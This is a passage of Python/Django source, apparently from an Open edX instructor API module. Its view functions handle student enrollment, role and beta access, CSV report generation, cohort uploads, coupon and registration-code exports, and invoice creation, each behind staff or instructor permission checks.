:param user: User who is to enroll in course
:param course_id: course identifier of the course in which to enroll the user.
:param mode: mode for user enrollment, e.g. 'honor', 'audit' etc.
:param enrolled_by: User who made the manual enrollment entry (usually instructor or support)
:param reason: Reason behind manual enrollment
:param state_transition: state transition denoting whether student enrolled from un-enrolled,
un-enrolled from enrolled etc.
:return CourseEnrollment instance.
"""
enrollment_obj = CourseEnrollment.enroll(user, course_id, mode=mode)
ManualEnrollmentAudit.create_manual_enrollment_audit(
enrolled_by, user.email, state_transition, reason, enrollment_obj
)
log.info(u'user %s enrolled in the course %s', user.username, course_id)
return enrollment_obj
def create_and_enroll_user(email, username, name, country, password, course_id, course_mode, enrolled_by, email_params):
"""
Create a new user and enroll him/her to the given course, return list of errors in the following format
Error format:
each error is key-value pait dict with following key-value pairs.
1. username: username of the user to enroll
1. email: email of the user to enroll
1. response: readable error message
:param email: user's email address
:param username: user's username
:param name: user's name
:param country: user's country
:param password: user's password
:param course_id: course identifier of the course in which to enroll the user.
:param course_mode: mode for user enrollment, e.g. 'honor', 'audit' etc.
:param enrolled_by: User who made the manual enrollment entry (usually instructor or support)
:param email_params: information to send to the user via email
:return: list of errors
"""
errors = list()
try:
with transaction.atomic():
# Create a new user
user = create_user_and_user_profile(email, username, name, country, password)
# Enroll user to the course and add manual enrollment audit trail
create_manual_course_enrollment(
user=user,
course_id=course_id,
mode=course_mode,
enrolled_by=enrolled_by,
reason='Enrolling via csv upload',
state_transition=UNENROLLED_TO_ENROLLED,
)
except IntegrityError:
errors.append({
'username': username, 'email': email, 'response': _('Username {user} already exists.').format(user=username)
})
except Exception as ex: # pylint: disable=broad-except
log.exception(type(ex).__name__)
errors.append({
'username': username, 'email': email, 'response': type(ex).__name__,
})
else:
try:
# It's a new user, an email will be sent to each newly created user.
email_params.update({
'message': 'account_creation_and_enrollment',
'email_address': email,
'password': password,
'platform_name': microsite.get_value('platform_name', settings.PLATFORM_NAME),
})
send_mail_to_student(email, email_params)
except Exception as ex: # pylint: disable=broad-except
log.exception(
"Exception '{exception}' raised while sending email to new user.".format(exception=type(ex).__name__)
)
errors.append({
'username': username,
'email': email,
'response':
_("Error '{error}' while sending email to new user (user email={email}). "
"Without the email student would not be able to login. "
"Please contact support for further information.").format(error=type(ex).__name__, email=email),
})
else:
log.info(u'email sent to new created user at %s', email)
return errors
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params(action="enroll or unenroll", identifiers="stringified list of emails and/or usernames")
def students_update_enrollment(request, course_id):
"""
Enroll or unenroll students by email.
Requires staff access.
Query Parameters:
- action in ['enroll', 'unenroll']
- identifiers is string containing a list of emails and/or usernames separated by anything split_input_list can handle.
- auto_enroll is a boolean (defaults to false)
If auto_enroll is false, students will be allowed to enroll.
If auto_enroll is true, students will be enrolled as soon as they register.
- email_students is a boolean (defaults to false)
If email_students is true, students will be sent email notification
If email_students is false, students will not be sent email notification
Returns an analog to this JSON structure: {
"action": "enroll",
"auto_enroll": false,
"results": [
{
"email": "testemail@test.org",
"before": {
"enrollment": false,
"auto_enroll": false,
"user": true,
"allowed": false
},
"after": {
"enrollment": true,
"auto_enroll": false,
"user": true,
"allowed": false
}
}
]
}
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
action = request.POST.get('action')
identifiers_raw = request.POST.get('identifiers')
identifiers = _split_input_list(identifiers_raw)
auto_enroll = request.POST.get('auto_enroll') in ['true', 'True', True]
email_students = request.POST.get('email_students') in ['true', 'True', True]
is_white_label = CourseMode.is_white_label(course_id)
reason = request.POST.get('reason')
if is_white_label:
if not reason:
return JsonResponse(
{
'action': action,
'results': [{'error': True}],
'auto_enroll': auto_enroll,
}, status=400)
enrollment_obj = None
state_transition = DEFAULT_TRANSITION_STATE
email_params = {}
if email_students:
course = get_course_by_id(course_id)
email_params = get_email_params(course, auto_enroll, secure=request.is_secure())
results = []
for identifier in identifiers:
# First try to get a user object from the identifer
user = None
email = None
language = None
try:
user = get_student_from_identifier(identifier)
except User.DoesNotExist:
email = identifier
else:
email = user.email
language = get_user_email_language(user)
try:
# Use django.core.validators.validate_email to check email address
# validity (obviously, cannot check if email actually /exists/,
# simply that it is plausibly valid)
validate_email(email) # Raises ValidationError if invalid
if action == 'enroll':
before, after, enrollment_obj = enroll_email(
course_id, email, auto_enroll, email_students, email_params, language=language
)
before_enrollment = before.to_dict()['enrollment']
before_user_registered = before.to_dict()['user']
before_allowed = before.to_dict()['allowed']
after_enrollment = after.to_dict()['enrollment']
after_allowed = after.to_dict()['allowed']
if before_user_registered:
if after_enrollment:
if before_enrollment:
state_transition = ENROLLED_TO_ENROLLED
else:
if before_allowed:
state_transition = ALLOWEDTOENROLL_TO_ENROLLED
else:
state_transition = UNENROLLED_TO_ENROLLED
else:
if after_allowed:
state_transition = UNENROLLED_TO_ALLOWEDTOENROLL
elif action == 'unenroll':
before, after = unenroll_email(
course_id, email, email_students, email_params, language=language
)
before_enrollment = before.to_dict()['enrollment']
before_allowed = before.to_dict()['allowed']
enrollment_obj = CourseEnrollment.get_enrollment(user, course_id)
if before_enrollment:
state_transition = ENROLLED_TO_UNENROLLED
else:
if before_allowed:
state_transition = ALLOWEDTOENROLL_TO_UNENROLLED
else:
state_transition = UNENROLLED_TO_UNENROLLED
else:
return HttpResponseBadRequest(strip_tags(
"Unrecognized action '{}'".format(action)
))
except ValidationError:
# Flag this email as an error if invalid, but continue checking
# the remaining in the list
results.append({
'identifier': identifier,
'invalidIdentifier': True,
})
except Exception as exc: # pylint: disable=broad-except
# catch and log any exceptions
# so that one error doesn't cause a 500.
log.exception(u"Error while #{}ing student")
log.exception(exc)
results.append({
'identifier': identifier,
'error': True,
})
else:
ManualEnrollmentAudit.create_manual_enrollment_audit(
request.user, email, state_transition, reason, enrollment_obj
)
results.append({
'identifier': identifier,
'before': before.to_dict(),
'after': after.to_dict(),
})
response_payload = {
'action': action,
'results': results,
'auto_enroll': auto_enroll,
}
return JsonResponse(response_payload)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@common_exceptions_400
@require_post_params(
identifiers="stringified list of emails and/or usernames",
action="add or remove",
)
def bulk_beta_modify_access(request, course_id):
"""
Enroll or unenroll users in beta testing program.
Query parameters:
- identifiers is string containing a list of emails and/or usernames separated by
anything split_input_list can handle.
- action is one of ['add', 'remove']
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
action = request.POST.get('action')
identifiers_raw = request.POST.get('identifiers')
identifiers = _split_input_list(identifiers_raw)
email_students = request.POST.get('email_students') in ['true', 'True', True]
auto_enroll = request.POST.get('auto_enroll') in ['true', 'True', True]
results = []
rolename = 'beta'
course = get_course_by_id(course_id)
email_params = {}
if email_students:
secure = request.is_secure()
email_params = get_email_params(course, auto_enroll=auto_enroll, secure=secure)
for identifier in identifiers:
try:
error = False
user_does_not_exist = False
user = get_student_from_identifier(identifier)
if action == 'add':
allow_access(course, user, rolename)
elif action == 'remove':
revoke_access(course, user, rolename)
else:
return HttpResponseBadRequest(strip_tags(
"Unrecognized action '{}'".format(action)
))
except User.DoesNotExist:
error = True
user_does_not_exist = True
# catch and log any unexpected exceptions
# so that one error doesn't cause a 500.
except Exception as exc: # pylint: disable=broad-except
log.exception(u"Error while #{}ing student")
log.exception(exc)
error = True
else:
# If no exception thrown, see if we should send an email
if email_students:
send_beta_role_email(action, user, email_params)
# See if we should autoenroll the student
if auto_enroll:
# Check if student is already enrolled
if not CourseEnrollment.is_enrolled(user, course_id):
CourseEnrollment.enroll(user, course_id)
finally:
# Tabulate the action result of this email address
results.append({
'identifier': identifier,
'error': error,
'userDoesNotExist': user_does_not_exist
})
response_payload = {
'action': action,
'results': results,
}
return JsonResponse(response_payload)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@common_exceptions_400
@require_post_params(
unique_student_identifier="email or username of user to change access",
rolename="'instructor', 'staff', 'beta', or 'ccx_coach'",
action="'allow' or 'revoke'"
)
def modify_access(request, course_id):
"""
Modify staff/instructor access of other user.
Requires instructor access.
NOTE: instructors cannot remove their own instructor access.
Query parameters:
unique_student_identifer is the target user's username or email
rolename is one of ['instructor', 'staff', 'beta', 'ccx_coach']
action is one of ['allow', 'revoke']
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
course = get_course_with_access(
request.user, 'instructor', course_id, depth=None
)
try:
user = get_student_from_identifier(request.POST.get('unique_student_identifier'))
except User.DoesNotExist:
response_payload = {
'unique_student_identifier': request.POST.get('unique_student_identifier'),
'userDoesNotExist': True,
}
return JsonResponse(response_payload)
# Check that user is active, because add_users
# in common/djangoapps/student/roles.py fails
# silently when we try to add an inactive user.
if not user.is_active:
response_payload = {
'unique_student_identifier': user.username,
'inactiveUser': True,
}
return JsonResponse(response_payload)
rolename = request.POST.get('rolename')
action = request.POST.get('action')
if rolename not in ROLES:
error = strip_tags("unknown rolename '{}'".format(rolename))
log.error(error)
return HttpResponseBadRequest(error)
# disallow instructors from removing their own instructor access.
if rolename == 'instructor' and user == request.user and action != 'allow':
response_payload = {
'unique_student_identifier': user.username,
'rolename': rolename,
'action': action,
'removingSelfAsInstructor': True,
}
return JsonResponse(response_payload)
if action == 'allow':
allow_access(course, user, rolename)
elif action == 'revoke':
revoke_access(course, user, rolename)
else:
return HttpResponseBadRequest(strip_tags(
"unrecognized action '{}'".format(action)
))
response_payload = {
'unique_student_identifier': user.username,
'rolename': rolename,
'action': action,
'success': 'yes',
}
return JsonResponse(response_payload)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@require_post_params(rolename="'instructor', 'staff', or 'beta'")
def list_course_role_members(request, course_id):
"""
List instructors and staff.
Requires instructor access.
rolename is one of ['instructor', 'staff', 'beta', 'ccx_coach']
Returns JSON of the form {
"course_id": "some/course/id",
"staff": [
{
"username": "staff1",
"email": "staff1@example.org",
"first_name": "Joe",
"last_name": "Shmoe",
}
]
}
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
course = get_course_with_access(
request.user, 'instructor', course_id, depth=None
)
rolename = request.POST.get('rolename')
if rolename not in ROLES:
return HttpResponseBadRequest()
def extract_user_info(user):
""" convert user into dicts for json view """
return {
'username': user.username,
'email': user.email,
'first_name': user.first_name,
'last_name': user.last_name,
}
response_payload = {
'course_id': course_id.to_deprecated_string(),
rolename: map(extract_user_info, list_with_level(
course, rolename
)),
}
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_problem_responses(request, course_id):
"""
Initiate generation of a CSV file containing all student answers
to a given problem.
Responds with JSON
{"status": "... status message ..."}
if initiation is successful (or generation task is already running).
Responds with BadRequest if problem location is faulty.
"""
course_key = CourseKey.from_string(course_id)
problem_location = request.POST.get('problem_location', '')
try:
problem_key = UsageKey.from_string(problem_location)
# Are we dealing with an "old-style" problem location?
run = problem_key.run
if not run:
problem_key = course_key.make_usage_key_from_deprecated_string(problem_location)
if problem_key.course_key != course_key:
raise InvalidKeyError(type(problem_key), problem_key)
except InvalidKeyError:
return JsonResponseBadRequest(_("Could not find problem with this location."))
try:
instructor_task.api.submit_calculate_problem_responses_csv(request, course_key, problem_location)
success_status = _(
"The problem responses report is being created."
" To view the status of the report, see Pending Tasks below."
)
return JsonResponse({"status": success_status})
except AlreadyRunningError:
already_running_status = _(
"A problem responses report generation task is already in progress. "
"Check the 'Pending Tasks' table for the status of the task. "
"When completed, the report will be available for download in the table below."
)
return JsonResponse({"status": already_running_status})
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_grading_config(request, course_id):
"""
Respond with json which contains a html formatted grade summary.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
course = get_course_with_access(
request.user, 'staff', course_id, depth=None
)
grading_config_summary = instructor_analytics.basic.dump_grading_context(course)
response_payload = {
'course_id': course_id.to_deprecated_string(),
'grading_config_summary': grading_config_summary,
}
return JsonResponse(response_payload)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_sale_records(request, course_id, csv=False): # pylint: disable=unused-argument, redefined-outer-name
"""
return the summary of all sales records for a particular course
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
query_features = [
'company_name', 'company_contact_name', 'company_contact_email', 'total_codes', 'total_used_codes',
'total_amount', 'created', 'customer_reference_number', 'recipient_name', 'recipient_email', 'created_by',
'internal_reference', 'invoice_number', 'codes', 'course_id'
]
sale_data = instructor_analytics.basic.sale_record_features(course_id, query_features)
if not csv:
for item in sale_data:
item['created_by'] = item['created_by'].username
response_payload = {
'course_id': course_id.to_deprecated_string(),
'sale': sale_data,
'queried_features': query_features
}
return JsonResponse(response_payload)
else:
header, datarows = instructor_analytics.csvs.format_dictlist(sale_data, query_features)
return instructor_analytics.csvs.create_csv_response("e-commerce_sale_invoice_records.csv", header, datarows)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_sale_order_records(request, course_id): # pylint: disable=unused-argument
"""
return the summary of all sales records for a particular course
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
query_features = [
('id', 'Order Id'),
('company_name', 'Company Name'),
('company_contact_name', 'Company Contact Name'),
('company_contact_email', 'Company Contact Email'),
('logged_in_username', 'Login Username'),
('logged_in_email', 'Login User Email'),
('purchase_time', 'Date of Sale'),
('customer_reference_number', 'Customer Reference Number'),
('recipient_name', 'Recipient Name'),
('recipient_email', 'Recipient Email'),
('bill_to_street1', 'Street 1'),
('bill_to_street2', 'Street 2'),
('bill_to_city', 'City'),
('bill_to_state', 'State'),
('bill_to_postalcode', 'Postal Code'),
('bill_to_country', 'Country'),
('order_type', 'Order Type'),
('status', 'Order Item Status'),
('coupon_code', 'Coupon Code'),
('list_price', 'List Price'),
('unit_cost', 'Unit Price'),
('quantity', 'Quantity'),
('total_discount', 'Total Discount'),
('total_amount', 'Total Amount Paid'),
]
db_columns = [x[0] for x in query_features]
csv_columns = [x[1] for x in query_features]
sale_data = instructor_analytics.basic.sale_order_record_features(course_id, db_columns)
__, datarows = instructor_analytics.csvs.format_dictlist(sale_data, db_columns)
return instructor_analytics.csvs.create_csv_response("e-commerce_sale_order_records.csv", csv_columns, datarows)
@require_level('staff')
@require_POST
def sale_validation(request, course_id):
"""
This method either invalidate or re validate the sale against the invoice number depending upon the event type
"""
try:
invoice_number = request.POST["invoice_number"]
except KeyError:
return HttpResponseBadRequest("Missing required invoice_number parameter")
try:
invoice_number = int(invoice_number)
except ValueError:
return HttpResponseBadRequest(
"invoice_number must be an integer, {value} provided".format(
value=invoice_number
)
)
try:
event_type = request.POST["event_type"]
except KeyError:
return HttpResponseBadRequest("Missing required event_type parameter")
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
try:
obj_invoice = CourseRegistrationCodeInvoiceItem.objects.select_related('invoice').get(
invoice_id=invoice_number,
course_id=course_id
)
obj_invoice = obj_invoice.invoice
except CourseRegistrationCodeInvoiceItem.DoesNotExist: # Check for old type invoices
return HttpResponseNotFound(_("Invoice number '{num}' does not exist.").format(num=invoice_number))
if event_type == "invalidate":
return invalidate_invoice(obj_invoice)
else:
return re_validate_invoice(obj_invoice)
def invalidate_invoice(obj_invoice):
"""
This method invalidate the sale against the invoice number
"""
if not obj_invoice.is_valid:
return HttpResponseBadRequest(_("The sale associated with this invoice has already been invalidated."))
obj_invoice.is_valid = False
obj_invoice.save()
message = _('Invoice number {0} has been invalidated.').format(obj_invoice.id)
return JsonResponse({'message': message})
def re_validate_invoice(obj_invoice):
"""
This method re-validate the sale against the invoice number
"""
if obj_invoice.is_valid:
return HttpResponseBadRequest(_("This invoice is already active."))
obj_invoice.is_valid = True
obj_invoice.save()
message = _('The registration codes for invoice {0} have been re-activated.').format(obj_invoice.id)
return JsonResponse({'message': message})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_issued_certificates(request, course_id):
"""
Responds with JSON if CSV is not required. contains a list of issued certificates.
Arguments:
course_id
Returns:
{"certificates": [{course_id: xyz, mode: 'honor'}, ...]}
"""
course_key = CourseKey.from_string(course_id)
csv_required = request.GET.get('csv', 'false')
query_features = ['course_id', 'mode', 'total_issued_certificate', 'report_run_date']
query_features_names = [
('course_id', _('CourseID')),
('mode', _('Certificate Type')),
('total_issued_certificate', _('Total Certificates Issued')),
('report_run_date', _('Date Report Run'))
]
certificates_data = instructor_analytics.basic.issued_certificates(course_key, query_features)
if csv_required.lower() == 'true':
__, data_rows = instructor_analytics.csvs.format_dictlist(certificates_data, query_features)
return instructor_analytics.csvs.create_csv_response(
'issued_certificates.csv',
[col_header for __, col_header in query_features_names],
data_rows
)
else:
response_payload = {
'certificates': certificates_data,
'queried_features': query_features,
'feature_names': dict(query_features_names)
}
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_students_features(request, course_id, csv=False): # pylint: disable=redefined-outer-name
"""
Respond with json which contains a summary of all enrolled students profile information.
Responds with JSON
{"students": [{-student-info-}, ...]}
TO DO accept requests for different attribute sets.
"""
course_key = CourseKey.from_string(course_id)
course = get_course_by_id(course_key)
available_features = instructor_analytics.basic.AVAILABLE_FEATURES
# Allow for microsites to be able to define additional columns.
# Note that adding additional columns has the potential to break
# the student profile report due to a character limit on the
# asynchronous job input which in this case is a JSON string
# containing the list of columns to include in the report.
# TODO: Refactor the student profile report code to remove the list of columns
# that should be included in the report from the asynchronous job input.
# We need to clone the list because we modify it below
query_features = list(microsite.get_value('student_profile_download_fields', []))
if not query_features:
query_features = [
'id', 'username', 'name', 'email', 'language', 'location',
'year_of_birth', 'gender', 'level_of_education', 'mailing_address',
'goals',
]
# Provide human-friendly and translatable names for these features. These names
# will be displayed in the table generated in data_download.coffee. It is not (yet)
# used as the header row in the CSV, but could be in the future.
query_features_names = {
'id': _('User ID'),
'username': _('Username'),
'name': _('Name'),
'email': _('Email'),
'language': _('Language'),
'location': _('Location'),
'year_of_birth': _('Birth Year'),
'gender': _('Gender'),
'level_of_education': _('Level of Education'),
'mailing_address': _('Mailing Address'),
'goals': _('Goals'),
}
if is_course_cohorted(course.id):
# Translators: 'Cohort' refers to a group of students within a course.
query_features.append('cohort')
query_features_names['cohort'] = _('Cohort')
if course.teams_enabled:
query_features.append('team')
query_features_names['team'] = _('Team')
# For compatibility reasons, city and country should always appear last.
query_features.append('city')
query_features_names['city'] = _('City')
query_features.append('country')
query_features_names['country'] = _('Country')
if not csv:
student_data = instructor_analytics.basic.enrolled_students_features(course_key, query_features)
response_payload = {
'course_id': unicode(course_key),
'students': student_data,
'students_count': len(student_data),
'queried_features': query_features,
'feature_names': query_features_names,
'available_features': available_features,
}
return JsonResponse(response_payload)
else:
try:
instructor_task.api.submit_calculate_students_features_csv(request, course_key, query_features)
success_status = _("The enrolled learner profile report is being created."
" To view the status of the report, see Pending Tasks below.")
return JsonResponse({"status": success_status})
except AlreadyRunningError:
already_running_status = _(
"This enrollment report is currently being created."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete.")
return JsonResponse({"status": already_running_status})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_students_who_may_enroll(request, course_id):
"""
Initiate generation of a CSV file containing information about
students who may enroll in a course.
Responds with JSON
{"status": "... status message ..."}
"""
course_key = CourseKey.from_string(course_id)
query_features = ['email']
try:
instructor_task.api.submit_calculate_may_enroll_csv(request, course_key, query_features)
success_status = _(
"The enrollment report is being created. This report contains"
" information about learners who can enroll in the course."
" To view the status of the report, see Pending Tasks below."
)
return JsonResponse({"status": success_status})
except AlreadyRunningError:
already_running_status = _(
"This enrollment report is currently being created."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete."
)
return JsonResponse({"status": already_running_status})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_POST
@require_level('staff')
def add_users_to_cohorts(request, course_id):
"""
View method that accepts an uploaded file (using key "uploaded-file")
containing cohort assignments for users. This method spawns a celery task
to do the assignments, and a CSV file with results is provided via data downloads.
"""
course_key = SlashSeparatedCourseKey.from_string(course_id)
try:
def validator(file_storage, file_to_validate):
"""
Verifies that the expected columns are present.
"""
with file_storage.open(file_to_validate) as f:
reader = unicodecsv.reader(UniversalNewlineIterator(f), encoding='utf-8')
try:
fieldnames = next(reader)
except StopIteration:
fieldnames = []
msg = None
if "cohort" not in fieldnames:
msg = _("The file must contain a 'cohort' column containing cohort names.")
elif "email" not in fieldnames and "username" not in fieldnames:
msg = _("The file must contain a 'username' column, an 'email' column, or both.")
if msg:
raise FileValidationException(msg)
__, filename = store_uploaded_file(
request, 'uploaded-file', ['.csv'],
course_and_time_based_filename_generator(course_key, "cohorts"),
max_file_size=2000000, # limit to 2 MB
validator=validator
)
# The task will assume the default file storage.
instructor_task.api.submit_cohort_students(request, course_key, filename)
except (FileValidationException, PermissionDenied) as err:
return JsonResponse({"error": unicode(err)}, status=400)
return JsonResponse()
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_coupon_codes(request, course_id): # pylint: disable=unused-argument
"""
Respond with csv which contains a summary of all Active Coupons.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
coupons = Coupon.objects.filter(course_id=course_id)
query_features = [
('code', _('Coupon Code')),
('course_id', _('Course Id')),
('percentage_discount', _('% Discount')),
('description', _('Description')),
('expiration_date', _('Expiration Date')),
('is_active', _('Is Active')),
('code_redeemed_count', _('Code Redeemed Count')),
('total_discounted_seats', _('Total Discounted Seats')),
('total_discounted_amount', _('Total Discounted Amount')),
]
db_columns = [x[0] for x in query_features]
csv_columns = [x[1] for x in query_features]
coupons_list = instructor_analytics.basic.coupon_codes_features(db_columns, coupons, course_id)
__, data_rows = instructor_analytics.csvs.format_dictlist(coupons_list, db_columns)
return instructor_analytics.csvs.create_csv_response('Coupons.csv', csv_columns, data_rows)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_finance_admin
def get_enrollment_report(request, course_id):
"""
get the enrollment report for the particular course.
"""
course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
try:
instructor_task.api.submit_detailed_enrollment_features_csv(request, course_key)
success_status = _("The detailed enrollment report is being created."
" To view the status of the report, see Pending Tasks below.")
return JsonResponse({"status": success_status})
except AlreadyRunningError:
already_running_status = _("The detailed enrollment report is being created."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete.")
return JsonResponse({
"status": already_running_status
})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_finance_admin
def get_exec_summary_report(request, course_id):
"""
get the executive summary report for the particular course.
"""
course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
try:
instructor_task.api.submit_executive_summary_report(request, course_key)
status_response = _("The executive summary report is being created."
" To view the status of the report, see Pending Tasks below.")
except AlreadyRunningError:
status_response = _(
"The executive summary report is currently being created."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete."
)
return JsonResponse({
"status": status_response
})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_course_survey_results(request, course_id):
"""
get the survey results report for the particular course.
"""
course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
try:
instructor_task.api.submit_course_survey_report(request, course_key)
status_response = _("The survey report is being created."
" To view the status of the report, see Pending Tasks below.")
except AlreadyRunningError:
status_response = _(
"The survey report is currently being created."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete."
)
return JsonResponse({
"status": status_response
})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_proctored_exam_results(request, course_id):
"""
get the proctored exam resultsreport for the particular course.
"""
query_features = [
'user_email',
'exam_name',
'attempt_code',
'allowed_time_limit_mins',
'is_sample_attempt',
'started_at',
'completed_at',
'status',
]
course_key = CourseKey.from_string(course_id)
try:
instructor_task.api.submit_proctored_exam_results_report(request, course_key, query_features)
status_response = _("The proctored exam results report is being created."
" To view the status of the report, see Pending Tasks below.")
except AlreadyRunningError:
status_response = _(
"The proctored exam results report is currently being created."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete."
)
return JsonResponse({
"status": status_response
})
def save_registration_code(user, course_id, mode_slug, invoice=None, order=None, invoice_item=None):
"""
recursive function that generate a new code every time and saves in the Course Registration Table
if validation check passes
Args:
user (User): The user creating the course registration codes.
course_id (str): The string representation of the course ID.
mode_slug (str): The Course Mode Slug associated with any enrollment made by these codes.
invoice (Invoice): (Optional) The associated invoice for this code.
order (Order): (Optional) The associated order for this code.
invoice_item (CourseRegistrationCodeInvoiceItem) : (Optional) The associated CourseRegistrationCodeInvoiceItem
Returns:
The newly created CourseRegistrationCode.
"""
code = random_code_generator()
# check if the generated code is in the Coupon Table
matching_coupons = Coupon.objects.filter(code=code, is_active=True)
if matching_coupons:
return save_registration_code(
user, course_id, mode_slug, invoice=invoice, order=order, invoice_item=invoice_item
)
course_registration = CourseRegistrationCode(
code=code,
course_id=unicode(course_id),
created_by=user,
invoice=invoice,
order=order,
mode_slug=mode_slug,
invoice_item=invoice_item
)
try:
with transaction.atomic():
course_registration.save()
return course_registration
except IntegrityError:
return save_registration_code(
user, course_id, mode_slug, invoice=invoice, order=order, invoice_item=invoice_item
)
def registration_codes_csv(file_name, codes_list, csv_type=None):
"""
Respond with the csv headers and data rows
given a dict of codes list
:param file_name:
:param codes_list:
:param csv_type:
"""
# csv headers
query_features = [
'code', 'redeem_code_url', 'course_id', 'company_name', 'created_by',
'redeemed_by', 'invoice_id', 'purchaser', 'customer_reference_number', 'internal_reference', 'is_valid'
]
registration_codes = instructor_analytics.basic.course_registration_features(query_features, codes_list, csv_type)
header, data_rows = instructor_analytics.csvs.format_dictlist(registration_codes, query_features)
return instructor_analytics.csvs.create_csv_response(file_name, header, data_rows)
def random_code_generator():
"""
generate a random alphanumeric code of length defined in
REGISTRATION_CODE_LENGTH settings
"""
code_length = getattr(settings, 'REGISTRATION_CODE_LENGTH', 8)
return generate_random_string(code_length)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_POST
def get_registration_codes(request, course_id):
"""
Respond with csv which contains a summary of all Registration Codes.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
#filter all the course registration codes
registration_codes = CourseRegistrationCode.objects.filter(
course_id=course_id
).order_by('invoice_item__invoice__company_name')
company_name = request.POST['download_company_name']
if company_name:
registration_codes = registration_codes.filter(invoice_item__invoice__company_name=company_name)
csv_type = 'download'
return registration_codes_csv("Registration_Codes.csv", registration_codes, csv_type)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_sales_admin
@require_POST
def generate_registration_codes(request, course_id):
"""
Respond with csv which contains a summary of all Generated Codes.
"""
course_id = CourseKey.from_string(course_id)
invoice_copy = False
# covert the course registration code number into integer
try:
course_code_number = int(request.POST['total_registration_codes'])
except ValueError:
course_code_number = int(float(request.POST['total_registration_codes']))
company_name = request.POST['company_name']
company_contact_name = request.POST['company_contact_name']
company_contact_email = request.POST['company_contact_email']
unit_price = request.POST['unit_price']
try:
unit_price = (
decimal.Decimal(unit_price)
).quantize(
decimal.Decimal('.01'),
rounding=decimal.ROUND_DOWN
)
except decimal.InvalidOperation:
return HttpResponse(
status=400,
content=_(u"Could not parse amount as a decimal")
)
recipient_name = request.POST['recipient_name']
recipient_email = request.POST['recipient_email']
address_line_1 = request.POST['address_line_1']
address_line_2 = request.POST['address_line_2']
address_line_3 = request.POST['address_line_3']
city = request.POST['city']
state = request.POST['state']
zip_code = request.POST['zip']
country = request.POST['country']
internal_reference = request.POST['internal_reference']
customer_reference_number = request.POST['customer_reference_number']
recipient_list = [recipient_email]
if request.POST.get('invoice', False):
recipient_list.append(request.user.email)
invoice_copy = True
sale_price = unit_price * course_code_number
set_user_preference(request.user, INVOICE_KEY, invoice_copy)
sale_invoice = Invoice.objects.create(
total_amount=sale_price,
company_name=company_name,
company_contact_email=company_contact_email,
company_contact_name=company_contact_name,
course_id=course_id,
recipient_name=recipient_name,
recipient_email=recipient_email,
address_line_1=address_line_1,
address_line_2=address_line_2,
address_line_3=address_line_3,
city=city,
state=state,
zip=zip_code,
country=country,
internal_reference=internal_reference,
customer_reference_number=customer_reference_number
)
invoice_item = CourseRegistrationCodeInvoiceItem.objects.create(
invoice=sale_invoice,
qty=course_code_number,
unit_price=unit_price,
course_id=course_id
)
course = get_course_by_id(course_id, depth=0)
paid_modes = CourseMode.paid_modes_for_course(course_id)
if len(paid_modes) != 1:
msg = (
u"Generating Code Redeem Codes for Course '{course_id}', which must have a single paid course mode. "
u"This is a configuration issue. Current course modes with payment options: {paid_modes}"
).format(course_id=course_id, paid_modes=paid_modes)
log.error(msg)
return HttpResponse(
status=500,
